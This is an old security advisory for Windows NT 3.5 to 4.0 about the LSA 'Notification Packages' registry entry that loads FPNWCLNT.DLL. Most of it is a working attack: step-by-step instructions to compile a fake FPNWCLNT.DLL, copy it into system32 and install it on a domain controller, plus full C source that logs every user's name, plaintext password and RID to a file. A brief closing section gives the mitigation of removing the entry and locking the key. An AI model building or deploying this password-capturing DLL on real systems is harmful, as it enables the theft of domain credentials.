COMMAND

    passwd

SYSTEMS AFFECTED

    Win NT 3.5, 3.51, 4.0

PROBLEM

    This vulnerability was originally presented on:

        www.ntshop.com/security

    and this text is their credit.

    The registry includes a default entry for

        <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa>

    which has a value

        <Notification Packages: REG_MULTI_SZ:FPNWCLNT>

    This  is  a  DLL  which   normally  exists  only  in  an   Netware
    environment.   A   false  FPNWCLNT.DLL  can   be  stored  in   the
    %systemroot%\system32 directory which collects passwords in  plain
    text.

    Comple  the  below  C  code  and  .DEF  file  into  a  DLL  called
    FPNWCLNT.DLL and copy it to %systemroot%\system32.

    Reboot the  machine. Password  changes and  new user  creation are
    funnelled  through  this  DLL  with  the  following   information,
    Username, Plaintext password, RID (relative domain id).

    Install on the Primary domain controller for an NT domain, and  it
    will capture all users passwords in plain text.

    Exploit code follows:

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    struct UNI_STRING {
    USHORT len;
    USHORT maxlen;
    WCHAR *buff;
    };

    static HANDLE fh;

    BOOLEAN __stdcall InitializeChangeNotify ()
    {
    DWORD wrote;
    fh = CreateFile("C:\\temp\\pwdchange.out",
    GENERIC_WRITE,
    FILE_SHARE_READ|FILE_SHARE_WRITE,
    0,
    CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
    0);
    WriteFile(fh, "InitializeChangeNotify started\n", 31,
    &wrote, 0);
    return TRUE;
    }

    LONG __stdcall PasswordChangeNotify (
    struct UNI_STRING *user,
    ULONG rid,
    struct UNI_STRING *passwd
    )
    {
    DWORD wrote;
    WCHAR wbuf[200];
    char buf[512];
    char buf1[200];
    DWORD len;

    memcpy(wbuf, user->buff, user->len);
    len = user->len/sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "User = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    memcpy(wbuf, passwd->buff, passwd->len);
    len = passwd->len/sizeof(WCHAR);
    wbuf[len] = 0;
    wcstombs(buf1, wbuf, 199);
    sprintf(buf, "Password = %s : ", buf1);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    sprintf(buf, "RID = %x\n", rid);
    WriteFile(fh, buf, strlen(buf), &wrote, 0);

    return 0L;
    }

SOLUTION

    The password sniffing DLL is placed as

        %SYSTEMROOT%\SYSTEM32\FPNWCLNT.DLL

    which is present in a netware environment, but otherwise does  not
    exist. The registry by default does have an entry which points  to
    this DLL.

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA has an
    entry:

        Notification Packages: REG_MULTI_SZ: FPNWCLNT.

    Make sure you remove this  entry and protect this location  in the
    registry to read-only.